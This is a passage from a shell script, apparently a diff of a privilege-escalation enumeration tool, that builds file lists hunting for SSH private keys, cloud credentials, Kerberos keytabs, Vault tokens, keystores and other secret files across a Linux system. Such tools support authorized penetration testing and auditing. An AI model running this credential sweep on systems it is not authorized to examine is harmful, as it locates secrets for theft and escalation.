"^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "cesi\.conf$" | sort | uniq | head -n 70) + PSTORAGE_RSYNC=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70) + PSTORAGE_HOSTAPD=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70) + PSTORAGE_VNC=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP\n$FIND_DIR_MEDIA\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_CDROM\n$FIND_DIR_USR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_MNT" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70) + PSTORAGE_LDAP=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_CDROM\n$FIND_DIR_USR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_MNT" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "ldap$" | sort | uniq | head -n 70) + PSTORAGE_OPENVPN=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E ".*\.ovpn$" | sort | uniq | head -n 70) + PSTORAGE_SSH=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$" | sort | uniq | head -n 70) + PSTORAGE_CERTSB4=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib.*' | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70) + PSTORAGE_CERTSBIN=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70) + PSTORAGE_CERTSCLIENT=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70) + PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/tmp" | grep -E "agent.*$" | sort | uniq | head -n 70) + PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/usr|^$GREPHOMESEARCH" | grep -E "ssh.*config$" | sort | uniq | head -n 70) + PSTORAGE_CLOUD_CREDENTIALS=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP\n$FIND_DIR_MEDIA\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_CDROM\n$FIND_DIR_USR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_MNT" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|\.bluemix$" | sort | uniq | head -n 70) + PSTORAGE_KERBEROS=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "krb5\.conf$|krb5\.keytab$|\.k5login$|kadm5\.acl$" | sort | uniq | head -n 70) + PSTORAGE_KIBANA=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70) + PSTORAGE_KNOCKD=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E '/etc/init.d/' | grep -E "^/etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70) + PSTORAGE_LOGSTASH=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_CDROM\n$FIND_DIR_USR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_MNT" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "logstash$" | sort | uniq | head -n 70) + PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70) + PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70) + PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "\.vault-token$" | sort | uniq | head -n 70) + PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_CDROM\n$FIND_DIR_USR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_MNT" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "couchdb$" | sort | uniq | head -n 70) + PSTORAGE_REDIS=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "redis\.conf$" | sort | uniq | head -n 70) + PSTORAGE_MOSQUITTO=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70) + PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_CDROM\n$FIND_DIR_USR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_MNT" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "neo4j$" | sort | uniq | head -n 70) + PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70) + PSTORAGE_ERLANG=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70) + PSTORAGE_GMV_AUTH=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70) + PSTORAGE_IPSEC=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70) + PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_CDROM\n$FIND_DIR_USR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_MNT" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "\.irssi$" | sort | uniq | head -n 70) + PSTORAGE_KEYRING=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP\n$FIND_DIR_MEDIA\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_CDROM\n$FIND_DIR_USR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_MNT" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70) + PSTORAGE_FILEZILLA=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP\n$FIND_DIR_MEDIA\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_CDROM\n$FIND_DIR_USR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_MNT" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "filezilla$|filezilla\.xml$|recentservers\.xml$" | sort | uniq | head -n 70) + PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70) + PSTORAGE_SPLUNK=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -E "^/snap|^/media|^/tmp|^$GREPHOMESEARCH|^/etc|^/sbin|^/.cache|^/cdrom|^/applications|^/mnt|^/private|^/usr|^/srv|^/bin|^/var|^/opt" | grep -E "passwd$" | sort | uniq | head -n 70) + PSTORAGE_GITLAB=$(echo -e "$FIND_LIB\n$FIND_MEDIA\n$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_CACHE\n$FIND_ETC\n$FIND_OPT\n$FIND_BIN\n$FIND_USR\n$FIND_MNT\n$FIND_CDROM\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SYS\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_LIB64\n$FIND_SNAP" | grep -v -E '/lib' | grep -E 